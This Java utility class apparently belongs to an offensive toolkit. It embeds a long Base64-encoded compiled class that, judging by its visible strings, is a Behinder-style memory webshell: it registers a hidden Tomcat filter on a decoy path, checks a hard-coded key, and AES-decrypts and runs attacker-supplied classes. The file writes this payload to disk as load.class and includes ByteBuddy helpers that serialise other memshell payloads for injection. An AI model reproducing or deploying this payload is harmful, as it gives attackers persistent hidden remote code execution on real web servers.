package cn.safe6.util;


import cn.safe6.payload.TomcatEchoAll;
import net.bytebuddy.ByteBuddy;

import java.io.*;
import java.nio.ByteBuffer;
import java.nio.CharBuffer;
import java.nio.charset.Charset;
import java.util.Arrays;
import java.util.Base64;

public class GetByteCodeUtil {

    public static void main(String[] args) throws Exception {
        decodeData();
       //encodeData();

        //getFileByBytes(TomcatEchoAll.getPayload(),"load.class");
    }

    public static void decodeData() throws Exception {

        String data ="yv66vgAAADQB3goAewD4CQBqAPkJAGoA+ggA+wkAagD8CAD9CQBqAP4IAP8JAGoBAAoAewEBCgB7AQIIAQMKAQQBBQoATwEGCgBPAQcKAQQBCAcBCQoBBAEKCgARAQsKABEBDAoATwENBwEOCgBqAQ8IARALADQBEQoAagESCACEBwETCgAcAPgIARQIARUIARYLADUBFwsANAEYCwA1ARgKAGoBGQoAHAEaBwEbCgAmAPgIARwKACYBHQoAFgEeCgAmAR4LADUBHwoAHAEeCgEgASEKASABIgoBIAEjCgA7ASQKADkBJQcArAcBJgcBJwgBKAoAOQEpCAEqBwErCgA5ASwHAS0KAS4BLwgBMAgAfQoAOQExCgEyATMKATIBNAgAfwsANAE1CwE2ATcIATgHATkHAToHATsIATwJAT0BPgoBMgE/CwE2AUAJAUEBQgoBQwFEBwFFCwDIAUYIAUcKADkBSAoBLgEzCQE9AUkIAUoIAUsIAL0IAUwKAE8BTQoBTgFPCAFQCgAWAVEIAVILADQBUwcBVAoAXwD4CwFVAVYIAOMIAVcLAVgBWQgBWgoBWwFcBwFdCgBnAV4KAVsBXwcBYAoAOQFhCgBqAQELAWIBYwoBZAFlCgBqAWYKAVsBZwoAagFoCgA5AWkKADsBagoAFgFrCAFsCAFtBwCSCAFuCAFvCAFwBwFxBwFyAQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAAmNzAQASTGphdmEvbGFuZy9TdHJpbmc7AQADUHdkAQAEcGF0aAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTHgvQmVoaW5kZXJGaWx0ZXI7AQAaKExqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBAAFjAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAFnAQAVKFtCKUxqYXZhL2xhbmcvQ2xhc3M7AQABYgEAAltCAQADbWQ1AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAFtAQAdTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAFzAQADcmV0AQANU3RhY2tNYXBUYWJsZQcBRQcBDgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAAZvdXRwdXQBABhMamF2YS9sYW5nL1N0cmluZ0J1ZmZlcjsBAAV0YWdfcwEABXRhZ19lBwFgBwEtBwETAQAIcGFyc2VPYmoBABUoTGphdmEvbGFuZy9PYmplY3Q7KVYBAARkYXRhAQATW0xqYXZhL2xhbmcvT2JqZWN0OwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAANyZXEBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIcmVxdWVzdDIBAARyZXNwAQACZXgBAAlhZGRGaWx0ZXIBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEADGZpbHRlck1hcE9iagEABG5hbWUBAAFpAQABSQEAEWZpbHRlclN0YXJ0TWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAlmaWx0ZXJNYXABAA5maW5kRmlsdGVyTWFwcwEACmZpbHRlck1hcHMBAA10bXBGaWx0ZXJNYXBzAQAFaW5kZXgBAAxjb250ZXh0RmllbGQBABJhcHBsaWNhdGlvbkNvbnRleHQBAC1Mb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uQ29udGV4dDsBAA9zdGFuZGFyZENvbnRleHQBACpMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dDsBAApzdGF0ZUZpZWxkAQASZmlsdGVyUmVnaXN0cmF0aW9uBwF0AQAHRHluYW1pYwEADElubmVyQ2xhc3NlcwEAKkxqYXZheC9zZXJ2bGV0L0ZpbHRlclJlZ2lzdHJhdGlvbiREeW5hbWljOwEADnNlcnZsZXRDb250ZXh0AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQ7AQAGZmlsdGVyAQAWTGphdmF4L3NlcnZsZXQvRmlsdGVyOwEACmZpbHRlck5hbWUBAAN1cmwHAXUHAXIHAXYHATkHAToHAXQHAXcHASsHAXgBAApFeGNlcHRpb25zAQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQAeTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7AQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47AQAHc2Vzc2lvbgEAIExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQAPTGphdmEvdXRpbC9NYXA7BwF5BwF6BwF7BwF8BwF9BwF+BwF/AQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANzdHIBAARpbml0AQAfKExqYXZheC9zZXJ2bGV0L0ZpbHRlckNvbmZpZzspVgEADGZpbHRlckNvbmZpZwEAHExqYXZheC9zZXJ2bGV0L0ZpbHRlckNvbmZpZzsBAAdkZXN0cm95AQAKU291cmNlRmlsZQEAE0JlaGluZGVyRmlsdGVyLmphdmEMAIUAhgwAfQB+DAB/AIABAAVVVEYtOAwAgQCCAQAQZWFjOWZhMzgzMzBhNzUzNQwAgwCCAQAQL2Zhdmljb25kZW1vLmljbwwAhACCDACFAIwMAYABgQEAA01ENQcBggwBgwGEDAGFAYYMAYcBiAwBiQGKAQAUamF2YS9tYXRoL0JpZ0ludGVnZXIMAYsBhgwAhQGMDAGNAY4MAY8BkAEAE2phdmEvbGFuZy9FeGNlcHRpb24MAKkAqgEAAXAMAZEAlAwAkwCUAQAWamF2YS9sYW5nL1N0cmluZ0J1ZmZlcgEAAy0+fAEAA3w8LQEACXRleHQvaHRtbAwBkgGTDAGUAZMMALQAtQwBlQGWAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAlFUlJPUjovLyAMAZUBlwwBjQC1DAGYAZkHAZoMAZsBkwwBnACGDAGdAIYMAZ4BnwwBoAGhAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAdamF2YXguc2VydmxldC5qc3AuUGFnZUNvbnRleHQMAaIBowEACmdldFJlcXVlc3QBAA9qYXZhL2xhbmcvQ2xhc3MMAaQBpQEAEGphdmEvbGFuZy9PYmplY3QHAXcMAaYBpwEAC2dldFJlc3BvbnNlDAGoAakHAXYMAaoBqwwBrAGtDAGuAa8HAXUMAbABsQEAB2NvbnRleHQBACtvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0AQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvdXRpbC9MaWZlY3ljbGVCYXNlAQAFc3RhdGUHAbIMAbMBtAwBtQG2DAC0AbcHAbgMAbkBugcBuwwBvAG9AQAQamF2YS9sYW5nL1N0cmluZwwBvgG/AQALZmlsdGVyU3RhcnQMAcABpQwBwQG0AQAvb3JnLmFwYWNoZS50b21jYXQudXRpbC5kZXNjcmlwdG9yLndlYi5GaWx0ZXJNYXABACRvcmcuYXBhY2hlLmNhdGFsaW5hLmRlcGxveS5GaWx0ZXJNYXABAA1nZXRGaWx0ZXJOYW1lDAHCAcMHAcQMAcUBxgEAB1N1Y2Nlc3MMAccAtQEAFUZpbHRlciBhbHJlYWR5IGV4aXN0cwwByAHJAQARamF2YS91dGlsL0hhc2hNYXAHAX0MAcoBywEAAXUHAXwMAcwBzQEAA0FFUwcBzgwBgwHPAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwAhQHQDADxAdEBABB4L0JlaGluZGVyRmlsdGVyDAHSAdMHAXkMAdQB1QcB1gwB1wC1DADtAO4MAdgB2QwAjwCQDAHaAdsMAJwAnQwB3ACGAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcgEADGRlY29kZUJ1ZmZlcgEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyAQAGZGVjb2RlAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAUamF2YXgvc2VydmxldC9GaWx0ZXIHAd0BAChqYXZheC9zZXJ2bGV0L0ZpbHRlclJlZ2lzdHJhdGlvbiREeW5hbWljAQAcamF2YXgvc2VydmxldC9TZXJ2bGV0Q29udGV4dAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9sYW5nL1Rocm93YWJsZQEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BAB5qYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb24BAA1qYXZhL3V0aWwvTWFwAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAHmphdmF4L3NlcnZsZXQvU2VydmxldEV4Y2VwdGlvbgEAC2RlZmluZUNsYXNzAQAXKFtCSUkpTGphdmEvbGFuZy9DbGFzczsBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBAAtnZXRJbnN0YW5jZQEAMShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvc2VjdXJpdHkvTWVzc2FnZURpZ2VzdDsBAAhnZXRCeXRlcwEABCgpW0IBAAZsZW5ndGgBAAMoKUkBAAZ1cGRhdGUBAAcoW0JJSSlWAQAGZGlnZXN0AQAGKElbQilWAQAIdG9TdHJpbmcBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQAJZ2V0SGVhZGVyAQAOc2V0Q29udGVudFR5cGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABRzZXRDaGFyYWN0ZXJFbmNvZGluZwEABmFwcGVuZAEALChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWZmZXI7AQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFcHJpbnQBAAVmbHVzaAEABWNsb3NlAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHaXNBcnJheQEAAygpWgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABFnZXRTZXJ2bGV0Q29udGV4dAEAICgpTGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQ7AQAVZ2V0RmlsdGVyUmVnaXN0cmF0aW9uAQA2KExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb247AQAib3JnL2FwYWNoZS9jYXRhbGluYS9MaWZlY3ljbGVTdGF0ZQEADVNUQVJUSU5HX1BSRVABACRMb3JnL2FwYWNoZS9jYXRhbGluYS9MaWZlY3ljbGVTdGF0ZTsBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBAFQoTGphdmEvbGFuZy9TdHJpbmc7TGphdmF4L3NlcnZsZXQvRmlsdGVyOylMamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb24kRHluYW1pYzsBABxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlAQAHUkVRVUVTVAEAHkxqYXZheC9zZXJ2bGV0L0Rpc3BhdGNoZXJUeXBlOwEAEWphdmEvdXRpbC9FbnVtU2V0AQACb2YBACUoTGphdmEvbGFuZy9FbnVtOylMamF2YS91dGlsL0VudW1TZXQ7AQAYYWRkTWFwcGluZ0ZvclVybFBhdHRlcm5zAQAqKExqYXZhL3V0aWwvRW51bVNldDtaW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAJZ2V0TWV0aG9kAQAHU1RBUlRFRAEAEGVxdWFsc0lnbm9yZUNhc2UBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBABBqYXZhL2xhbmcvU3lzdGVtAQAJYXJyYXljb3B5AQAqKExqYXZhL2xhbmcvT2JqZWN0O0lMamF2YS9sYW5nL09iamVjdDtJSSlWAQAKZ2V0TWVzc2FnZQEACmdldFNlc3Npb24BACIoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlc3Npb247AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAhwdXRWYWx1ZQEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDspVgEAE2phdmF4L2NyeXB0by9DaXBoZXIBACkoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZheC9jcnlwdG8vQ2lwaGVyOwEAFyhbQkxqYXZhL2xhbmcvU3RyaW5nOylWAQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAlnZXRSZWFkZXIBABooKUxqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBAAhyZWFkTGluZQEAB2RvRmluYWwBAAYoW0IpW0IBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQAPcHJpbnRTdGFja1RyYWNlAQAgamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb24AMQBqAHsAAQB8AAUAAQB9AH4AAAABAH8AgAAAAAEAgQCCAAAAAQCDAIIAAAABAIQAggAAAAsAAQCFAIYAAQCHAAAAYwACAAEAAAAhKrcAASoBtQACKgG1AAMqEgS1AAUqEga1AAcqEgi1AAmxAAAAAgCIAAAAHgAHAAAAHgAEABgACQAZAA4AGgAUABsAGgAcACAAHwCJAAAADAAB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";
        System.out.println(data);
        System.out.println("oldLen:"+data.length());
        getFileByBytes(Base64.getDecoder().decode(data),"load.class");

        //对比生成前后，长度差距
        //String newData = Base64.getEncoder().encodeToString(getBytesForFile("load.class"));
        //System.out.println(newData);
        //System.out.println("newLen:"+ newData.length());

    }

    public static void encodeData(){
        byte[] code= new ByteBuddy()
                .redefine(cn.safe6.payload.memshell.BehinderLoader2.class)
                .name("cn.safe6.payload.memshell.BehinderLoader2")
                .make()
                .getBytes();
        System.out.println(Base64.getEncoder().encodeToString(code));
    }

    public static String getEncodeData(Class className){
        byte[] code= new ByteBuddy()
                .redefine(className)
                .name(className.getName())
                .make()
                .getBytes();
        return Base64.getEncoder().encodeToString(code);
    }

    public static byte[] getDataBytes(Class className){
        byte[] code= new ByteBuddy()
                .redefine(className)
                .name(className.getName())
                .make()
                .getBytes();
        return code;
    }


    //将Byte数组转换成文件
    public static void getFileByBytes(byte[] bytes, String fileName) {
        BufferedOutputStream bos = null;
        FileOutputStream fos = null;
        File file = null;
        try {
            file = new File(fileName);
            fos = new FileOutputStream(file);
            bos = new BufferedOutputStream(fos);
            bos.write(bytes);
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            if (bos != null) {
                try {
                    bos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (fos != null) {
                try {
                    fos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }


    public static byte[] getBytesForFile(String fileName) {
        BufferedInputStream bos = null;
        FileInputStream fos = null;
        File file = new File(fileName);
        byte[] b = new byte[(int)file.length()];
        try {
            fos = new FileInputStream(file);
            bos = new BufferedInputStream(fos);
            bos.read(b);
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            if (bos != null) {
                try {
                    bos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (fos != null) {
                try {
                    fos.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
        return b;
    }

    public static byte[] getBytes(char[] chars) {
        Charset cs = Charset.forName("UTF-8");
        CharBuffer cb = CharBuffer.allocate(chars.length);
        cb.put(chars);
        cb.flip();
        ByteBuffer bb = cs.encode(cb);
        return bb.array();
    }




}
